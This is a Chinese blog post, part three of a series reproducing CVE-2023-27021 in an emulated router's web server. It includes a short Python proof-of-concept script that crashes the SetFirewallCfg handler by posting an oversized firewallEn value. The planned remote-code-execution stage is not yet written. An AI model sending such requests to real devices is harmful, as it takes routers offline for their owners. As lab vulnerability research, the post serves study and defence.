CVE-2023-27021复现过程(三)

最新推荐文章于 2024-07-12 15:53:09 发布
最新推荐文章于 2024-07-12 15:53:09 发布
阅读量271 收藏 4
点赞数 5
文章标签: 系统安全 安全 iot 模块测试
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/u010829693/article/details/136675283
版权

1. 访问测试

上一次分析中我们看到post请求中会有参数,我们可以通过浏览器的f12控制台窗口查看找到对应的功能。
在这里插入图片描述
save按钮点击时,是SetFirewllCfg,再看它的请求参数,发现刚好是httpd中逆向得到的内容
在这里插入图片描述
好了,那我们可以使用控制台fetch直接发送xhr请求测试,这里修改firewallEn参数的内容很大给500个A,回车发送后
在这里插入图片描述

在这里插入图片描述
结果如上,发生段错误,同时连接失败重启测试看看

import requests

url = "http://10.0.2.16/goform/SetFirewallCfg"
header = {
    "Content-Type": "application/x-www-form-urlencoded; charset=UTF-8",
    "Cookie": "password=rtp5gk"
}

payload = "A" * 500
data = {"firewallEn": payload}
response = requests.post(url, headers=header, data=data, timeout=5)
response = requests.post(url, headers=header, data=data, timeout=5)
print(response.text)

这是python脚本实现,这里的10.0.2.16换成程序提示的ip即可,现在只能证明是存在拒绝服务,但是具体的rce利用还要往下走

2.漏洞利用

2.1 搭建gdb环境

安装了gdb-multiarch、gdb-peda、pwntools等插件,配置了gdb的调试环境。

这个就先等等。。

卧龙丹心
关注
  • 5
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
CVE-2023-25157-main(1).zip
07-19
在此次描述的案例中,我们关注的是CVE-2023-25157,这是一个针对GeoServer的SQL注入漏洞。 **SQL注入** 是一种常见的网络安全攻击手段,攻击者通过构造恶意的SQL语句来欺骗数据库管理系统,从而获取未经授权的数据...
CVE-2023-32315-Openfire-Bypass-main.zip
07-17
复现 CVE-2023-32315 的过程包括以下步骤: 1. **环境准备**:设置一个运行 Openfire 的测试环境,确保版本包含该漏洞。 2. **漏洞分析**:研究 Openfire 的源代码,定位与认证相关的函数和模块,寻找可能的绕过...
海康威视__RCE漏洞_CVE-2023-6895 漏洞复现
m0_64366018的博客
01-13 1033
2.复现过程 2.1页面展示 ******************************************************************************************喜欢就点点收藏和关注,如何多人喜欢的话,我尽量日更最新漏洞的复现!!******************************************************************************************
CVE-2023-27021复现过程(一)
miniPython的博客
03-06 235
cve链接:https://cve.mitre.org/cgi-bin/cvename.cgi?环境配置过程中,chroot命令是切换根目录命令,因为该固件解包得到的内容如下,是一个类linux环境,所以使用chroot切换根目录。这里还需要建立一个网卡,使用以下命令建立一个br0的网桥。
CVE-2023-38831漏洞复现过程(Winrar漏洞)
weixin_47948655的博客
10-08 336
CVE-2023-38831漏洞复现过程(Winrar漏洞)
GitLab任意用户密码重置漏洞(CVE-2023-7028)复现
m0_64366018的博客
01-13 1804
2024年1月11日,Gitlab官方披露CVE-2023-7028 GitLab 任意用户密码重置漏洞,官方评级严重。攻击者可利用忘记密码功能,构造恶意请求获取密码重置链接从而重置密码。官方已发布安全更新,建议升级至最新版本,若无法升级,建议利用安全组功能设置Gitlab仅对可信地址开放。
WinRAR 0day漏洞CVE-2023-38831复现最详解
weixin_45971758的博客
08-28 1539
WinRAR 的CVE-2023-38831 漏洞被在野利用来攻击交易类的个人用户。影响版本:WinRar 版本 < 6.23。
CVE-2023-21839漏洞复现(基于vulhub)
weixin_63960760的博客
09-11 840
由于Weblogic IIOP/T3协议存在缺陷,当IIOP/T3协议开启时,允许未经身份验证的攻击者通过IIOP/T3协议网络访问攻击存在安全风险的WebLogic Server,漏洞利用成功WebLogic Server可能被攻击者接管执行任意命令导致服务器沦陷或者造成严重的敏感数据泄露。
Weblogic远程代码执行漏洞(CVE-2023-21839)复现
yunshang_secure的博客
12-23 2018
复现过程中,会出现各种各样报错,小伙伴多找网上文章解决,本文仅作参考。
CVE-2023-27021复现过程(二)
miniPython的博客
03-09 760
用我这个代码可以获得匹配的开源库,代码可以自行去查看分析,运行结果如下,大部分是cve相关,其中Linux-C-Examples中的goahead软件是要分析的。这里能看到是loop去判断wp->path和sp->urlPrefix是否匹配,匹配就执行该handler,sp是websUrlHandlerType,wp是传入的,一路下来wp是从main函数一路传下来的,那么wp很重要,由于ida没有源代码,所以是没有这个结构体的,补充结构体信息。导入的时候,先导入ringq_t成功。
系统架构师考点--系统安全
qq_41534540的博客
07-11 746
信息摘要就是一段数据的特征信息,当数据发生了改变,信息摘要也会发生改变,发送方会将数据和信息摘要一起传给接收方,接收方会根据接收到的数据重新生成一个信息摘要,若此摘要和接收到的摘要相同,则说明数据正确。信息摘要是由哈希函数生成的。信息摘要的特点:不算数据多长,都会产生固定长度的信息摘要;任何不同的输入数据,都会产生不同的信息摘要:单向性,即只能由数据生成信息摘要不能由信息摘要还原数据。信息摘要算法:MD5(产生128位的输出)、SHA-1(安全散列算法,产生160位的输出,安全性更高)。
移动互联安全扩展要求测评项
hakksjss的博客
07-10 1146
应为无线接入设备的安装选择合理位置,避免过度覆盖和电磁干扰。无线接入设备的安装位置选择不当,易被攻击者利用,特别是攻击者会通过无线信号过度覆盖的弱点进行无线渗透攻击,因此要选择合理的位置安装无线接入设备。
车载视频监控管理方案:无人驾驶出租车安全出行的保障
最新发布
TSINGSEE青犀视频官方技术博客
07-12 730
为了确保数据的安全性和可靠性,本方案采用云存储技术,将车辆视频数据和相关信息存储在云端。
中小学校园EasyCVR视频综合监管方案:构建安全、智能的校园环境
TSINGSEE青犀视频官方技术博客
07-10 1191
针对校园食堂后厨、仓库、配菜、清洗等监控区域的环境卫生与安全等进行全面的监管,及时发现违规异常情况,并能向监管人员及时发送告警信息,保障在校师生的食品与饮食安全
[图解]SysML和EA建模住宅安全系统-14-黑盒系统规约
rolt的专栏
07-10 820
系统的外部可观察行为和物理特征
junos中的CVE-2021-0256的复现过程
05-14
以下是CVE-2021-0256的复现过程: 1. 首先,在Junos OS版本15.1X49-D200及更早版本中,使用以下命令检查系统是否受到该漏洞的影响: show system commit show system rollback compare 0 2. 如果设备受到此漏洞的...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值